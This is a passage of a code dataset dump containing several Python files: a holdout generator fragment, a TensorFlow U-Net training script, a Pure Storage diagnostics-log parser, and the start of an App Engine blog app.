)\n\n return holdout, {\n \"test_size\": test_size,\n \"random_state\": random_state\n }\n\n\ndef balanced_random_holdouts(test_sizes: List[float], quantities: List[int], random_state: int = 42, hyper_parameters: Dict = None) -> List[Tuple[Callable, str, List]]:\n \"\"\"Return a Generator of functions to create an holdouts with given test_sizes.\n test_sizes:List[float], floats from 0 to 1, representing how many datapoints should be reserved to the test set.\n quantities:List[int], quantities of holdouts for each test_size.\n random_state:int=42, random state to reproduce experiment.\n hyper_parameters:Dict, additional hyper-parameters used to create the holdout.\n \"\"\"\n if len(test_sizes) > 1:\n return [\n (\n *balanced_random_holdout(test_sizes[0], random_state+i, hyper_parameters),\n balanced_random_holdouts(\n test_sizes[1:], quantities[1:], random_state+i, hyper_parameters)\n ) for i in range(quantities[0])\n ]\n return [(*balanced_random_holdout(test_sizes[0], random_state+i, hyper_parameters), None) for i in range(quantities[0])]\n","sub_path":"holdouts_generator/balanced_random_holdouts.py","file_name":"balanced_random_holdouts.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"427225607","text":"import tensorflow as tf\nimport sys\nsys.path.append('../')\nimport os\nimport tools.development_kit as dk\nfrom tools.loss import get_loss\nfrom data_process.preprocess import augmentImages\nimport time\nfrom data_process.use_seg_tfrecord import create_inputs_seg_hand as create_inputs\nfrom choice import cfg\nfrom choice import model\nfrom choice import is_train\nfrom choice import restore_model\n\n\n############################### cfg ####################################\nckpt =cfg.ckpt\nbatch_size = cfg.batch_size\ninput_shape = cfg.input_shape\nlabels_shape = cfg.labels_shape\nlabels_shape_vec = cfg.labels_shape_vec\nepoch = cfg.epoch\ntrain_data_number = cfg.train_data_number\ntest_data_number = cfg.test_data_number\nsave_epoch_n = cfg.save_epoch_n #每多少epoch保存一次\nlogdir = cfg.logdir\n############################## end ########################################\n\nn_batch_train = int(train_data_number //batch_size)\nos.makedirs(ckpt,exist_ok=True)\nsession_config = dk.set_gpu()\n\nif __name__== '__main__':\n with tf.Session(config = session_config) as sess:\n # 入口\n train_x, train_y = create_inputs(is_train)\n # train_y = tf.reshape(train_y,labels_shape)\n x = tf.placeholder(tf.float32, shape=input_shape)\n y = tf.placeholder(tf.float32, shape=labels_shape)\n # 构建网络和预测\n prediction = model(images= x, is_train =is_train,size= input_shape,l2_reg =0.0001 )\n # 求loss\n # loss = dk.cross_entropy_loss(prediction, y)\n the_loss = get_loss('bce_dice')\n loss = the_loss(y, prediction,labels_shape_vec)\n # 设置优化器\n global_step, train_step = dk.set_optimizer(num_batches_per_epoch=n_batch_train, loss=loss)\n # 求dice_hard,不合适用acc\n dice_hard = dk.dice_hard(y, prediction, threshold=0.5, axis=[1, 2, 3], smooth=1e-5)\n # accuracy = dk.get_acc(prediction, y)\n # 初始化变量\n coord, threads = dk.init_variables_and_start_thread(sess)\n # 设置训练日志\n summary_dict = {'loss':loss,'dice_hard':dice_hard}\n summary_writer, summary_op = dk.set_summary(sess,logdir,summary_dict)\n # 恢复model\n saver,start_epoch = dk.restore_model(sess, ckpt, restore_model=restore_model) # 显示参数量\n dk.show_parament_numbers()\n # 若恢复model,则重新计算start_epoch继续\n # start_epoch = 0\n # if restore_model:\n # step = sess.run(global_step)\n # start_epoch = int(step/n_batch_train/save_epoch_n)*save_epoch_n\n # 训练loop\n total_step = n_batch_train * epoch\n for epoch_n in range(start_epoch,epoch):\n since = time.time()\n for n_batch in range(n_batch_train):\n batch_x, batch_y = sess.run([train_x, train_y])\n ########################## 数据增强 ###################################\n batch_x = batch_x / 255.0 # 归一化,加了这句话loss值小了几十倍\n batch_x, batch_y = augmentImages(batch_x, batch_y)\n ########################## end #######################################\n # 训练一个step\n _, loss_value, dice_hard_value, summary_str, step = sess.run(\n [train_step, loss, dice_hard, summary_op, global_step],\n feed_dict={x: batch_x, y: batch_y})\n # 显示结果batch_size\n dk.print_effect_message(epoch_n,n_batch,n_batch_train,loss_value,dice_hard_value)\n # 保存summary\n if (step + 1) % 20 == 0:\n summary_writer.add_summary(summary_str, step)\n\n # 显示进度和耗时\n seconds_mean = (time.time() - since) / n_batch_train\n dk.print_progress_and_time_massge(seconds_mean,step,total_step)\n # 保存model\n if (((epoch_n + 1) % save_epoch_n)) == 0:\n print('epoch_n :{} saving movdel.......'.format(epoch_n))\n saver.save(sess,os.path.join(ckpt,'model_{}.ckpt'.format(epoch_n)), global_step=global_step)\n\n dk.stop_threads(coord,threads)","sub_path":"my_seg_tf/v10_segcap_128_128/history/train_unet.py","file_name":"train_unet.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"169735944","text":"\"\"\"Contains parser definitions on how to extract data from the frequentdiagnostics log.\"\"\"\n\nimport logging\n\nfrom collections import defaultdict\n\ntry:\n # pylint: disable=redefined-builtin\n from itertools import izip as zip\nexcept ImportError:\n # This only exists in Python 2.\n pass\n\nimport six\nimport ujson\n\n# pylint: disable=unused-import\ntry:\n from typing import Any\n from typing import Dict\n from typing import List\n from typing import Optional\n from typing import Tuple\nexcept ImportError:\n pass\n\nfrom photon.lib import parser_utils\nfrom photon.lib import dict_utils\nfrom photon.lib import format_utils\nfrom photon.lib import time_utils\n\nLOGGER = logging.getLogger(__name__)\n# pylint: disable=too-few-public-methods, too-many-public-methods, invalid-name, line-too-long\n\n\nclass FDiagFormData(parser_utils.FormData):\n \"\"\"Forms used by the FDiagnosticsParser.\"\"\"\n\n diagnostics = parser_utils.SimpleTextForm(\n text_to_match='] Diagnostics: {',\n regexes={},\n )\n\n\nclass FDiagLogData(parser_utils.LogData):\n \"\"\"Manage information about a piece Data from the logs.\"\"\"\n\n def __init__(self, needed_forms):\n # type: (List[Any]) -> None\n \"\"\"Create an object to track needed forms.\"\"\"\n fdiag_forms = FDiagFormData()\n super(FDiagLogData, self).__init__({form: fdiag_forms[form] for form in needed_forms})\n\n\nclass FDiagnosticsParser(parser_utils.ParallelLogParser):\n \"\"\"Defines all fdiag data parsing functions.\"\"\"\n forms = FDiagFormData()\n _fields = {\n 'actual_system_space',\n 'array_id',\n 'array_name',\n 'cap_for_hidden',\n 'capacity',\n 'controller_num',\n 'controller_model',\n 'controller_model_local',\n 'controller_serial',\n 'copyout_error_extents',\n 'data_reduction',\n 'domain_name',\n 'eradicated_vol_phys',\n 'fdiags',\n 'fdiags_unflattened',\n 'is_primary',\n 'live_physical_space',\n 'local_time',\n 'logical_discrepancy',\n 'newly_written_space',\n 'num_shelves',\n 'pgroup_settings',\n 'pgroup_snaps',\n 'physical_discrepancy',\n 'physical_space',\n 'pslun_names',\n 'purealert_list',\n 'pureapp_list',\n 'puredb_list_drives',\n 'puredb_list_job',\n 'puredrive_list',\n 'purehw_list',\n 'puremessage_list_audit',\n 'purepod_list_array',\n 'purity_version',\n 'reclaimable_space',\n 'replbond_info',\n 'reported_pyramid',\n 'reported_raid',\n 'san_targets',\n 'sas_port_info',\n 'serials',\n 'shared_space',\n 'snapshot_space',\n 'ssd_capacity',\n 'ssd_mapped',\n 'system_space',\n 'thin_provisioning',\n 'total_reduction',\n 'triage_error',\n 'unknown_space',\n 'unreachable_extent_phys',\n 'unreported_pyramid',\n 'unreported_raid',\n 'unreported_ratio',\n 'unreported_space',\n 'vector_space',\n 'visible_system_space',\n 'volume_space',\n }\n fields = {field: FDiagLogData(['diagnostics']) for field in _fields}\n\n def _pull_value(self, dict_map):\n # type: (List[str]) -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Delve into a multi-level fdiags dict to get a particular nested sub-value.\"\"\"\n fdiag_values = []\n for timestamp, fdiags in self.get_field('fdiags'):\n fdiags_tree = dict_utils.DictTree(fdiags)\n try:\n value = fdiags_tree.get_branch_value(dict_map)\n except KeyError:\n # The key mapping does not exist within this dict_tree.\n value = None\n fdiag_values.append((timestamp, value))\n return sorted(fdiag_values)\n\n def get_array_id(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for array_id.\"\"\"\n results = []\n net_ids = self._pull_value(['controller.info', 'net_array_id'])\n fc_ids = self._pull_value(['controller.info', 'fc_array_id'])\n iscsi_ids = self._pull_value(['controller.info', 'iscsi_array_id'])\n # Array ID is composed of: 'net_id-fc_id-iscsi_id'\n for index, value_tuple in enumerate(net_ids):\n timestamp = value_tuple[0]\n if not value_tuple[1]:\n results.append((timestamp, value_tuple[1]))\n continue\n net_id = str(value_tuple[1])\n fc_id = str(fc_ids[index][1])\n iscsi_id = str(iscsi_ids[index][1])\n # Append the tuple: (timestamp, array_id)\n results.append((timestamp, '-'.join([net_id, fc_id, iscsi_id])))\n return results\n\n def get_array_name(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for array_name.\"\"\"\n return self._pull_value(['controller.info', 'array_name'])\n\n def get_actual_system_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, int]]\n \"\"\"Parse all fdiags for actual_system_space space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.actual_system_space', 'value'])\n\n def get_cap_for_hidden(self):\n # type: () -> List[Tuple[time_utils.Timestamp, int]]\n \"\"\"Parse all fdiags for cap_for_hidden space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.cap_for_hidden', 'value'])\n\n def get_capacity(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for capacity.\"\"\"\n return self._pull_value(['purearray.list.space', 'capacity'])\n\n def get_controller_num(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for ct_num.\"\"\"\n return self._pull_value(['controller.info', 'controller_name'])\n\n def get_controller_model(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for controller_model to mimic diagnostics.log.\"\"\"\n # Expected output:\n # {'Model': ['FA-420', 'FA-420'], 'Name': ['CT0', 'CT1']}\n ct_model = []\n for timestamp, ctlr_info in self._pull_value(['purearray.list.controller']):\n model_dict = {\n 'Model': [],\n 'Name': [],\n }\n for ct_num, ct_info in six.iteritems(ctlr_info):\n model_dict['Model'].append(ct_info['model'])\n model_dict['Name'].append(ct_num)\n ct_model.append((timestamp, model_dict))\n return ct_model\n\n def get_controller_model_local(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for ct_model from the controller the log came from.\"\"\"\n model_idents = {\n 'beta medium': 'FA-300',\n 'HS-1235T-ATX': 'FA-300',\n 'gamma_minus medium': 'FA-405',\n '0JP31P': 'FA-420',\n 'gamma medium': 'FA-420',\n 'gamma_plus medium': 'FA-450',\n 'platinum_sas_a small': 'FA-m20',\n 'platinum_sas_a medium': 'FA-m50',\n 'platinum_sas_a big': 'FA-m70',\n 'platinum_sas_b tiny': 'FA-m10r2',\n 'platinum_sas_b small': 'FA-m20r2',\n 'platinum_sas_b medium': 'FA-m50r2',\n 'platinum_sas_b big': 'FA-m70r2',\n 'platinum_sas_b huge': 'FA-m70r2',\n }\n ct_model = []\n for timestamp, model in self._pull_value(['controller.info', 'controller_model']):\n if not model:\n ct_model.append((timestamp, model))\n continue\n if isinstance(model, list):\n # The lists are generally formatted like this\n # 'controller_model': ['gamma', 'medium']\n model = ' '.join(model)\n # We need to translate the model type we got from CA to the standard FA-XXX name\n if model in model_idents:\n model = model_idents[model]\n ct_model.append((timestamp, model))\n return ct_model\n\n def get_controller_serial(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for ct_serial.\"\"\"\n return self._pull_value(['controller.info', 'controller_sn'])\n\n def get_copyout_error_extents(self):\n # type: () -> List[Tuple[time_utils.Timestamp, str]]\n \"\"\"Parse all fdiags for copyout_error_extents space.\"\"\"\n values = self._pull_value(['puredb.dump.health', 'space.copyout_error_extents', 'value'])\n results = []\n # These are a count so we need a string not an int.\n for timestamp, value in values:\n if value:\n value = str(value)\n results.append((timestamp, value))\n return results\n\n def get_data_reduction(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for data_reduction.\"\"\"\n return self._pull_value(['purearray.list.space', 'data_reduction'])\n\n def get_domain_name(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for domain_name.\"\"\"\n return self._pull_value(['controller.info', 'sender_domain'])\n\n def get_eradicated_vol_phys(self):\n # type: () -> List[Tuple[time_utils.Timestamp, int]]\n \"\"\"Parse all fdiags for eradicated_vol_phys space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.eradicated_vol_phys', 'value'])\n\n def get_fdiags(self):\n # type: () -> List[Tuple[Any, Dict[str, Any]]]\n \"\"\"Flatten the frequent diagnostics contents.\"\"\"\n parsed = []\n for timestamp, fdiags in self.get_fdiags_unflattened():\n # Flatten the contents of the JSON Blob for easier navigation.\n parsed.append((timestamp, _flatten_json_section(fdiags)))\n return parsed\n\n def get_fdiags_unflattened(self):\n # type: () -> List[Tuple[Any, Dict[str, Any]]]\n \"\"\"Parse the frequent diagnostics contents.\"\"\"\n parsed = []\n for diag_line in self.get_form_lines('diagnostics'):\n time_str, contents = diag_line.split(' [monitord:WARNING] Diagnostics: ', 1)\n timestamp = time_utils.Timestamp(time_str)\n json_blob = ujson.loads(contents, precise_float=True)\n parsed.append((timestamp, json_blob))\n return parsed\n\n def get_is_primary(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for is_primary.\"\"\"\n return self._pull_value(['controller.info', 'is_primary'])\n\n def get_live_physical_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for live physical space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.live_physical', 'value'])\n\n def get_local_time(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for local_time.\"\"\"\n return self._pull_value(['controller.info', 'local_time'])\n\n def get_logical_discrepancy(self):\n # type: () -> List[Tuple[time_utils.Timestamp, int]]\n \"\"\"Parse all fdiags for logical_discrepancy space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.logical_discrepancy', 'value'])\n\n def get_newly_written_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for live physical space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.space_newly_written', 'value'])\n\n def get_num_shelves(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for num_shelves.\"\"\"\n hw_parts = []\n for timestamp, parts in self._pull_value(['purehw.list']):\n if not parts:\n hw_parts.append((timestamp, parts))\n continue\n num_parts = len([part for part in six.itervalues(parts) if part['type'] == 'storage_shelf'])\n hw_parts.append((timestamp, num_parts))\n return hw_parts\n\n def get_pgroup_settings(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for pgroup_settings.\"\"\"\n settings = []\n results = self._pull_value(['purepgroup.list.schedule'])\n for timestamp, pgroups in results:\n if not pgroups:\n settings.append((timestamp, pgroups))\n continue\n pgroup_settings = {}\n for pgroup_name, pgroup in six.iteritems(pgroups):\n pgroup_settings[pgroup_name] = pgroup\n settings.append((timestamp, pgroup_settings))\n return settings\n\n def get_pgroup_snaps(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for pgroup snapshot information.\"\"\"\n return self._pull_value(['purepgroup.list.snap'])\n\n def get_physical_discrepancy(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for physical discrepancy space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.physical_discrepancy', 'value'])\n\n def get_physical_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for physical_space.\"\"\"\n physical_space = []\n for timestamp, space_info in self._pull_value(['purearray.list.space']):\n if not space_info:\n physical_space.append((timestamp, space_info))\n continue\n volume = format_utils.to_raw(space_info['volumes'], 'binary_bytes')\n shared = format_utils.to_raw(space_info['shared_space'], 'binary_bytes')\n snapshots = format_utils.to_raw(space_info['snapshots'], 'binary_bytes')\n system_space = format_utils.to_raw(space_info['system'], 'binary_bytes')\n physical_space.append((timestamp, int(volume + shared + snapshots + system_space)))\n return physical_space\n\n def get_pslun_names(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for pslun_names.\"\"\"\n pslun_names = []\n for timestamp, purevol in self._pull_value(['purevol.list.space']):\n if not purevol:\n pslun_names.append((timestamp, purevol))\n continue\n names = {}\n for volume_name, volume in six.iteritems(purevol):\n if volume_name == '(total)':\n continue\n if 'id' in volume:\n pslun = str(volume['id'])\n elif 'id' in volume.get('space', {}):\n pslun = str(volume['space']['id'])\n else:\n continue\n names[pslun] = volume_name\n pslun_names.append((timestamp, names))\n return pslun_names\n\n def get_purealert_list(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for purealert_list.\"\"\"\n return self._pull_value(['purealert.list'])\n\n def get_pureapp_list(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for pureapp_list.\"\"\"\n return self._pull_value(['pureapp.list'])\n\n def get_puredb_list_drives(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for puredb_list_drives.\"\"\"\n return self._pull_value(['puredb.list.drives'])\n\n def get_puredb_list_job(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for puredb_list_job.\"\"\"\n return self._pull_value(['puredb.list.job'])\n\n def get_puredrive_list(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for puredrive_list.\"\"\"\n return self._pull_value(['puredrive.list'])\n\n def get_purehw_list(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for purehw_list.\"\"\"\n return self._pull_value(['purehw.list'])\n\n def get_puremessage_list_audit(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for puremessage_list_audit.\"\"\"\n return self._pull_value(['puremessage_list_audit'])\n\n def get_purepod_list_array(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for purepod_list_array.\"\"\"\n return self._pull_value(['purepod.list.array'])\n\n def get_purity_version(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for purity_version.\"\"\"\n return self._pull_value(['controller.info', 'version', 'product_version'])\n\n def get_reclaimable_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for reclaimable space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.reclaimable', 'value'])\n\n def get_replbond_info(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for replication speed and interfaces.\"\"\"\n replbond_info = []\n for timestamp, interfaces in self._pull_value(['purenetwork.list']):\n if not interfaces:\n replbond_info.append((timestamp, interfaces))\n continue\n for iface_name, config in six.iteritems(interfaces):\n if iface_name != 'replbond':\n continue\n # Depending on Purity version we either have 'status' = enabled or 'enabled' = True\n if not config.get('status') == 'enabled' and not config.get('enabled'):\n continue\n slave_ifs = config.get('slaves', [])\n if not slave_ifs:\n break\n slaves = ', '.join(sorted(slave_ifs))\n if config['speed'] == 10**9:\n speed = '1G'\n elif config['speed'] == 10**10:\n speed = '10G'\n else:\n speed = config['speed']\n if not (slaves and speed):\n slaves = \"Replication not enabled\"\n speed = \"Replication not enabled\"\n replbond_info.append((timestamp, {'Replication Speed': speed, 'Replication Slaves': slaves}))\n return replbond_info\n\n def get_reported_pyramid(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for reported pyramid space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.reported_pyramid', 'value'])\n\n def get_reported_raid(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for reported RAID space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.reported_raid', 'value'])\n\n def get_san_targets(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for san_targets.\"\"\"\n san_targets = []\n for timestamp, array_ports in self._pull_value(['pureport.list']):\n if not array_ports:\n san_targets.append((timestamp, array_ports))\n continue\n targets = {'iqn': {}, 'wwn': {}}\n\n for port_name, port in six.iteritems(array_ports):\n iqn = port.get('iqn')\n wwn = port.get('wwn')\n if iqn:\n targets['iqn'][port_name] = iqn\n elif wwn:\n # Convert the raw WWN value to a human readable format.\n readable_wwn = format_utils.split_str(wwn, delim=':', every=2)\n targets['wwn'][port_name] = readable_wwn\n san_targets.append((timestamp, targets))\n return san_targets\n\n def get_sas_port_info(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for sas_port_info.\"\"\"\n sas_port_info = []\n sections = ('index', 'slot', 'speed', 'status')\n for timestamp, purehw in self._pull_value(['purehw.list']):\n if not purehw:\n sas_port_info.append((timestamp, purehw))\n continue\n sas_ports = {'ct0': {}, 'ct1': {}}\n for part_name, part in six.iteritems(purehw):\n full_part_name = part_name.lower()\n if not full_part_name.startswith('ct'):\n continue\n if part['type'] == 'sas_port':\n ctlr, part_name = part['name'].lower().split('.', 1)\n sas_port = {}\n for info in sections:\n if info in part:\n sas_port[info] = part[info]\n wwn = hex(part.get('wwn')).replace('0x', '').upper()\n sas_port['wwn'] = ':'.join([x+y for x, y in zip(wwn[::2], wwn[1::2])])\n sas_ports[ctlr][part_name] = sas_port\n sas_port_info.append((timestamp, sas_ports))\n return sas_port_info\n\n def get_serials(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for serials.\"\"\"\n serials = []\n enclosure_types = ['chassis', 'controller', 'storage_shelf']\n for timestamp, purehw in self._pull_value(['purehw.list']):\n if not purehw:\n serials.append((timestamp, purehw))\n continue\n enclosures = [part for part in six.itervalues(purehw) if part['type'] in enclosure_types]\n hw_serials = {}\n for part in enclosures:\n name = part['name'].lower()\n serial = part['handle'].split('_')[-1]\n if name == 'ctx':\n name = self.get_field('ct_num')\n hw_serials[name] = serial.lower()\n serials.append((timestamp, hw_serials))\n return serials\n\n def get_shared_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for shared_space.\"\"\"\n return self._pull_value(['purearray.list.space', 'shared_space'])\n\n def get_snapshot_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for snapshot_space.\"\"\"\n return self._pull_value(['purearray.list.space', 'snapshots'])\n\n def get_ssd_capacity(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for ssd_capacity.\"\"\"\n ssd_capacity = []\n for timestamp, puredrive in self._pull_value(['puredrive.list']):\n if not puredrive:\n ssd_capacity.append((timestamp, puredrive))\n continue\n healthy_drives = [drv for drv in six.itervalues(puredrive) if drv['status'] == 'healthy']\n # PT-2242: Check status before type.\n # If a drive has a status of 'unused', then it won't have a type key.\n capacity = sum([int(drive['capacity']) for drive in healthy_drives if drive['type'] == 'SSD'])\n ssd_capacity.append((timestamp, int(capacity)))\n return ssd_capacity\n\n def get_ssd_mapped(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for ssd_mapped.\"\"\"\n return self._pull_value(['puredb.list.ssd_mapped', 'bytes'])\n\n def get_system_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for system_space.\"\"\"\n return self._pull_value(['purearray.list.space', 'system'])\n\n def get_thin_provisioning(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for thin_provisioning.\"\"\"\n return self._pull_value(['purearray.list.space', 'thin_provisioning'])\n\n def get_total_reduction(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for total_reduction.\"\"\"\n return self._pull_value(['purearray.list.space', 'total_reduction'])\n\n def get_triage_error(self):\n # type: () -> List[Tuple[time_utils.Timestamp, int]]\n \"\"\"Parse all fdiags for triage_error space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.triage_error', 'value'])\n\n def get_unknown_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for unknown space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.space_summary_unknown', 'value'])\n\n def get_unreachable_extent_phys(self):\n # type: () -> List[Tuple[time_utils.Timestamp, str]]\n \"\"\"Parse all fdiags for unreachable_extent_phys space.\"\"\"\n values = self._pull_value(['puredb.dump.health', 'space.unreachable_extent_phys', 'value'])\n results = []\n # These are a count so we need a string not an int.\n for timestamp, value in values:\n if value:\n value = str(value)\n results.append((timestamp, value))\n return results\n\n def get_unreported_pyramid(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for unreported pyramid space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.unreported_pyramid', 'value'])\n\n def get_unreported_raid(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for unreported RAID space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.unreported_raid', 'value'])\n\n def get_unreported_ratio(self):\n # type: () -> List[Tuple[time_utils.Timestamp, float]]\n \"\"\"Parse all fdiags for unreported_ratio space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.unreported_ratio', 'value'])\n\n def get_unreported_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for unreported_space.\"\"\"\n unreported_space = []\n # Diagnosing: High System/Unreported Space wiki.\n # https://wiki.purestorage.com/pages/viewpage.action?pageId=23995245\n # unreported = ssd_mapped - ((volume + shared + snapshots) / 0.778 # 0.778 == 1 - 2/9\n ssd_mapped = self.get_field('ssd_mapped')\n shared_space = self.get_field('shared_space')\n snapshot_space = self.get_field('snapshot_space')\n volume_space = self.get_field('volume_space')\n for index, mapped_tuple in enumerate(ssd_mapped):\n timestamp = mapped_tuple[0]\n if not mapped_tuple[1]:\n unreported_space.append((timestamp, mapped_tuple[1]))\n continue\n mapped = mapped_tuple[1]\n volume = volume_space[index][1]\n shared = shared_space[index][1]\n snapshot = snapshot_space[index][1]\n used = volume + shared + snapshot\n unreported = int(mapped - (used / 0.778))\n if unreported < 0:\n unreported = 0\n unreported_space.append((timestamp, unreported))\n return unreported_space\n\n def get_visible_system_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, int]]\n \"\"\"Parse all fdiags for visible_system_space space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.visible_system_space', 'value'])\n\n def get_volume_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for volume_space.\"\"\"\n return self._pull_value(['purearray.list.space', 'volumes'])\n\n def get_vector_space(self):\n # type: () -> List[Tuple[time_utils.Timestamp, Any]]\n \"\"\"Parse all fdiags for vector space.\"\"\"\n return self._pull_value(['puredb.dump.health', 'space.vector_space', 'value'])\n\n\ndef _flatten_json_section(json_blob):\n # type: (Dict[str, Any]) -> Dict[str, Any]\n \"\"\"Flatten a section of the JSON blob by using sub-keys.\"\"\"\n flattened = defaultdict(dict)\n for section, contents in six.iteritems(json_blob):\n # PT-2160: puredb list drives needs own logic otherwise all drives are not found.\n if section == 'puredb.list.drives':\n flattened[section] = contents\n continue\n if isinstance(contents, list):\n if len(contents) == 1:\n flattened[section] = contents[0]\n else:\n temp = {}\n for item in contents:\n if isinstance(item, dict):\n if 'name' in item:\n temp[item['name']] = item\n else:\n temp.update(item)\n else:\n # We cannot reliably unpack this further.\n temp = contents\n break\n flattened[section] = temp\n elif isinstance(contents, dict):\n flattened[section] = _flatten_json_section(contents)\n else:\n flattened[section] = contents\n return dict(flattened)\n","sub_path":"backend/pure/logs/frequentdiagnostics.py","file_name":"frequentdiagnostics.py","file_ext":"py","file_size_in_byte":29104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"191677541","text":"import webapp2\nimport os\nimport sys\nimport re\nimport cgi\nimport jinja2\nfrom google.appengine.ext import db\n\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\nfile_system_loader = jinja2.FileSystemLoader(template_dir)\njinja_env = jinja2.Environment(loader = file_system_loader, autoescape = True)\n\n\n\nclass BaseHandler(webapp2.RequestHandler):\n def render(self, template, **kwd):\n t = jinja_env.get_template(template)\n self.response.out.write(t.render(kwd))\n return\n\nclass Blog(db.Model):\n subject = db.StringProperty(required = True)\n content = db.TextProperty(required = True)\n created = db.DateTimeProperty(auto_now_add = True)\n \n\nclass MainPage(BaseHandler):\n def get(self):\n blogs = db.GqlQuery(\"SELECT * FROM Blog ORDER BY created DESC\")\n self.render('blog.html', blogs=blogs)\n return\n\nclass NewPost(BaseHandler):\n def get(self):\n self.render('newpost-form.html')\n return\n \n def post(self):\n subject = self.request.get('subject')\n content = self.request.get('content')\n\n if subject and content:\n blog = Blog(subject = subject, content = content)\n blog.put()\n self.redirect('/newentry/%d' % blog.key().id())\n else:\n self.render('newpost-form.html',\n subject = subject,\n content = content,\n error = \"You must enter both a subject and some content.\")\n\nclass NewEntry(BaseHandler):\n def get(self, post_id):\n key = 